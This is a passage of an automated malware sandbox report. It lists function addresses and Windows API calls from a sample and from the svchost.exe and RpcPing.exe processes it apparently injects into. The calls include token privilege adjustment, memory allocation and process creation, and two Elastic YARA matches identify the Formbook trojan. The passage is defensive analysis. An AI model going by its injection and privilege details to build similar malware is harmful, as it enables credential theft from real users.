            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC3D10 NtOpenProcessToken,5_2_02FC3D10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004F9140 NtReadFile,5_2_004F9140
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004F9230 NtDeleteFile,5_2_004F9230
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004F92D0 NtClose,5_2_004F92D0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004F9430 NtAllocateVirtualMemory,5_2_004F9430
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004F8FD0 NtCreateFile,5_2_004F8FD0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_03EBE2580_2_03EBE258
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_03EC1A600_2_03EC1A60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004184432_2_00418443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011C02_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EB132_2_0042EB13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023A02_2_004023A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC7A2_2_0040FC7A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FC832_2_0040FC83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004166232_2_00416623
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FEA32_2_0040FEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026AA2_2_004026AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026B02_2_004026B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F702_2_00402F70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DF232_2_0040DF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA3522_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E3F02_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033003E62_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E02742_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C02C02_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032301002_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DA1182_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C81582_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033001AA2_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F81CC2_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D20002_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032407702_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032647502_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C02_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325C6E02_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032405352_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033005912_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E44202_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F24462_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EE4F62_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB402_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F6BD72_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA802_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032569622_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A02_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330A9A62_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324A8402_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032428402_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032268B82_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E8F02_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03282F282_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260F302_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E2F302_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4F402_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BEFA02_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324CFE02_2_0324CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232FC82_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEE262_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240E592_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252E902_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FCE932_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FEEDB2_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324AD002_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DCD1F2_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03258DBF2_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323ADE02_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240C002_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E0CB52_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230CF22_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F132D2_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322D34C2_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0328739A2_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032452A02_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E12ED2_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B2C02_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327516C2_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322F1722_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0330B16B2_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324B1B02_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F70E92_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF0E02_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EF0CC2_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032470C02_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF7B02_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F16CC2_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F75712_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DD5B02_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FF43F2_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032314602_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFB762_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FB802_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B5BF02_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327DBF92_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B3A6C2_2_032B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFA492_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7A462_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DDAAC2_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03285AA02_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E1AA32_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EDAC62_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D59102_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032499502_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325B9502_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AD8002_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032438E02_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFF092_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFFB12_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03241F922_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203FD22_2_03203FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03203FD52_2_03203FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03249EB02_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F7D732_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243D402_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F1D5A2_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325FDC02_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B9C322_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FFCF22_2_032FFCF2
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C4215A4_2_02C4215A
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C4A8AF4_2_02C4A8AF
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C421AF4_2_02C421AF
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C421BE4_2_02C421BE
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C4412F4_2_02C4412F
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C4C6874_2_02C4C687
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C43F064_2_02C43F06
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C43F0F4_2_02C43F0F
            Source: C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exeCode function: 4_2_02C62D9F4_2_02C62D9F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304A3525_2_0304A352
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030503E65_2_030503E6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F9E3F05_2_02F9E3F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030302745_2_03030274
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030102C05_2_030102C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0302A1185_2_0302A118
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030181585_2_03018158
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030501AA5_2_030501AA
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030481CC5_2_030481CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030220005_2_03022000
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F801005_2_02F80100
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FAC6E05_2_02FAC6E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F8C7C05_2_02F8C7C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F907705_2_02F90770
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FB47505_2_02FB4750
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030505915_2_03050591
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030424465_2_03042446
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F905355_2_02F90535
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0303E4F65_2_0303E4F6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304AB405_2_0304AB40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F8EA805_2_02F8EA80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03046BD75_2_03046BD7
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FBE8F05_2_02FBE8F0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F768B85_2_02F768B8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0305A9A65_2_0305A9A6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F9A8405_2_02F9A840
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F928405_2_02F92840
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F929A05_2_02F929A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FA69625_2_02FA6962
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03004F405_2_03004F40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FA2E905_2_02FA2E90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F90E595_2_02F90E59
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0300EFA05_2_0300EFA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F9CFE05_2_02F9CFE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304EE265_2_0304EE26
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F82FC85_2_02F82FC8
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304CE935_2_0304CE93
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FB0F305_2_02FB0F30
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FD2F285_2_02FD2F28
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304EEDB5_2_0304EEDB
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F80CF25_2_02F80CF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F90C005_2_02F90C00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F8ADE05_2_02F8ADE0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FA8DBF5_2_02FA8DBF
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03030CB55_2_03030CB5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F9AD005_2_02F9AD00
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304132D5_2_0304132D
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FAB2C05_2_02FAB2C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F952A05_2_02F952A0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FD739A5_2_02FD739A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F7D34C5_2_02F7D34C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030312ED5_2_030312ED
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F970C05_2_02F970C0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0305B16B5_2_0305B16B
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F9B1B05_2_02F9B1B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F7F1725_2_02F7F172
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FC516C5_2_02FC516C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0303F0CC5_2_0303F0CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304F0E05_2_0304F0E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030470E95_2_030470E9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304F7B05_2_0304F7B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030416CC5_2_030416CC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_030475715_2_03047571
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F814605_2_02F81460
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0302D5B05_2_0302D5B0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304F43F5_2_0304F43F
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FD5AA05_2_02FD5AA0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304FB765_2_0304FB76
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03005BF05_2_03005BF0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FCDBF95_2_02FCDBF9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03047A465_2_03047A46
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304FA495_2_0304FA49
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03003A6C5_2_03003A6C
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FAFB805_2_02FAFB80
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0302DAAC5_2_0302DAAC
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0303DAC65_2_0303DAC6
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F938E05_2_02F938E0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FFD8005_2_02FFD800
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F999505_2_02F99950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FAB9505_2_02FAB950
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304FF095_2_0304FF09
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F99EB05_2_02F99EB0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304FFB15_2_0304FFB1
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F53FD55_2_02F53FD5
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F53FD25_2_02F53FD2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F91F925_2_02F91F92
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03041D5A5_2_03041D5A
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03047D735_2_03047D73
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_03009C325_2_03009C32
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02FAFDC05_2_02FAFDC0
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_02F93D405_2_02F93D40
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_0304FCF25_2_0304FCF2
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004E1B905_2_004E1B90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004E52305_2_004E5230
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004E34105_2_004E3410
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004FB9005_2_004FB900
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004DCA675_2_004DCA67
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004DCA705_2_004DCA70
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004DCC905_2_004DCC90
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_004DAD105_2_004DAD10
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00AEE3085_2_00AEE308
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00AEE4245_2_00AEE424
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00AEE7C35_2_00AEE7C3
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00AED8285_2_00AED828
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 5_2_00AECB135_2_00AECB13
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: String function: 00445AE0 appears 65 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 105 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 02FD7E54 appears 99 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 0300F290 appears 105 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 02FFEA12 appears 86 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 02F7B970 appears 274 times
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: String function: 02FC5130 appears 37 times
            Source: xBzBOQwywT.exe, 00000000.00000003.1591484081.000000000486D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs xBzBOQwywT.exe
            Source: xBzBOQwywT.exe, 00000000.00000003.1591353836.00000000046C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs xBzBOQwywT.exe
            Source: xBzBOQwywT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
